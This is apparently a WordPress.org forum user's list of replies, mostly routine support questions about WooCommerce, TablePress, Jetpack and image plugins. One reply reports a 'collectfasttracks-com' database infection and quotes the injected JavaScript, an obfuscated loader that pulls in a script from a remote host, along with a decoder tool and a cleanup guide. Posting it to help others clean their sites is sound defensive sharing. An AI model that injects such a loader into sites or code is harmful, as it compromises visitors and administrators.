madzzoni
Forum Replies Created
-
Forum: Plugins
In reply to: [YITH WooCommerce Subscription] Error in the checkout for paymentsHi there,
I have the samme checkout problem as @promi above!!!
I using last WordPress and Woocommerce version.
Please help with this, THX ??
Best regards!
Works ! Thx ??
Hi again, do you mean “name” ? like this:
add_action( “woocommerce_email_before_order_table”, “custom_woocommerce_email_before_order_table”, 10, 1);
function custom_woocommerce_email_before_order_table( $order ) {
echo do_shortcode( ‘[wcj_order_checkout_field name=”billing_wcj_checkout_field_1″ meta_key = “billing_wcj_checkout_field_1”]‘ );
} (Not working!)
I just followed your own instructions shown for this modul, so could you please be more specific:
“After setting Checkout Custom Fields, you can use below shortcode with meta_key to display the Product Input Fields value:?
- Shortcodes:
[wcj_order_checkout_field meta_key = "billing_wcj_checkout_field_<field_id>"]
field_id is the key of your Checkout Custom Fields, You will find key from Option Custom Field - PHP code: by using
do_shortcode()
function,
e.g.:echo do_shortcode( '[wcj_order_checkout_field meta_key = "billing_wcj_checkout_field_1]' );
Hi again,
I solved this problem today. Although I have WordFence with Firewall installed, my site was infected with the “collectfasttracks-com” Malware in the database which blocked WooCommerce for normal visitors and hacked the checkout site for logged in users/admins!I found this code under my user/customer profiles in WP Dashboard:
<script type = text / javascript> (function () {var elem = document.createElement ('script'); elem.type = 'text / javascript'; elem.src = String.fromCharCode (104,116,116,112,115,58,47,47,100,101,115,116) , 46,99,111,108,108,101,99,116,102,97,115,116,116,114,97,99,107,115,46,99,111,109,47,103,108,111,99,107); document.getElementsByTagName ("head") [0] .appendChild (elem);}) (); </ script>
Then i used this Quttera-tool to decode this script: https://malwaredecoder.com
See this guide for more help, if U got this problem too!: https://guides.magefix.com/2020/03/dest-collectfasttracks-com/
Hope this is helpful for others! ??
Cheers, madzzoni
Forum: Plugins
In reply to: [Stock Manager for WooCommerce] Loading failedI got the same problem!!: Version 2.0.2 / WordPress 5.2.3
How to fix?
Forum: Plugins
In reply to: [Jetpack - WP Security, Backup, Speed, & Growth] Deleting an imageHello,
i have the same problem, i need to delete these 5 photos from your CDN:
https://i2.wp.com/www.brautstudio-anke-tworuschka.de/wp-content/uploads/2018/08/DS-192-12-Sam-3.jpghttps://i1.wp.com/www.brautstudio-anke-tworuschka.de/wp-content/uploads/2018/08/DS-192-12-Sam-2.jpg
https://i1.wp.com/www.brautstudio-anke-tworuschka.de/wp-content/uploads/2018/08/DS-192-12-Sam.jpg
https://i2.wp.com/www.brautstudio-anke-tworuschka.de/wp-content/uploads/2018/08/DS-192-12-Sam-5.jpg
https://i0.wp.com/www.brautstudio-anke-tworuschka.de/wp-content/uploads/2018/08/DS-192-12-Sam-4.jpg
They are already removed from the Mediathek.
Thanks in advance!
-HenrikForum: Plugins
In reply to: [Imsanity] Not working with WordPress 4.9.2Hello,
seems like there is a problem since 4.9.2! Bulk Resize Images doesn’t work. Nothing happens, tried with 1 image too, without success ?? … I use the default WP Media library. (No warning or error messages!)Forum: Themes and Templates
In reply to: [Bento] Use Grid layout on category pagesHi Bento-folks!
Thx for a fine free theme at the first impression. But i can’t get the Masonry-Grid Layout for posts on either “Blog-page” or “Category-pages” to work at all! I’ve followed your instructions in the “Bento Manuel” but this doesn’t work for me with posts in the actual version as you promised!
All posts are set as “Masonry”, but the blog-page is only showing a long ugly list!!
Can You tell me what to do?Cheers, Madzzoni
Forum: Plugins
In reply to: [Optimize Images Resizing] Didn't change the size of ONE SINGLE image!Hi,
I perfectly read the description, that’s why i tried your plugin:- Resize images only when needed
- Clean up existing images sizes
- No performance hit
- Free up your hosting space
But wenn none of this above happens, what is the goal af this plugin then?
Resizing means resizing!!
Forum: Plugins
In reply to: [Optimize Images Resizing] Didn't change the size of ONE SINGLE image!… and the Sizes didn’t change on the front-end either!
Forum: Plugins
In reply to: [Optimize Images Resizing] Didn't change the size of ONE SINGLE image!Hi, How do you understand “Images Resizing” ??
Forum: Plugins
In reply to: [TablePress - Tables in WordPress made easy] ColumnFilterWidgets apperanceThanks Tobias, the
DataTables Counter Column
plugin did the job.Regards madzzoni
Forum: Plugins
In reply to: [TablePress - Tables in WordPress made easy] ColumnFilterWidgets apperanceHallo Tobias,
Thanks for a awesome Plugin. I use TablePress to show the results for each Driver in a Motorsportclub.
I have 1 Table with all the drivers and all the race-events, and using then yourPro Table Row Order Extension 1.2
to sort the results as DESC and thehide_column
tag to choose which columns i wanna show for each race.
See race 1 and race 2
I want to use Column A for the Positions (Like No 1,2,3,4,5,6 …), but i can’t figure out how to keep the Column A Positions-rows in place, wenn the driver-positions change after each race and new points.Can you help me here?
Thx, madzzoni
Forum: Plugins
In reply to: [The Events Calendar] Changing the "@" symbol in the Time-detailsUps, find it under TEC Preferences !!!
Forum: Plugins
In reply to: [Jigoshop] Jigoshop Checkout field ManagerHi, is it possibly to show the register-form (Check-out) as a widget in the WP-theme sidebar, like fx. the Jigo Cart-widget, with this Check-out-fm Plugin?
I need a “register-form” form that the customer can fill out with their info (Name, email, address, social number and Company-name, before they actually add products in the cart, and that these data remain in their fields, when they click “pay” and hit the Jigoshop Check-out and payment site, without further registration.Thx in advance.
- Shortcodes: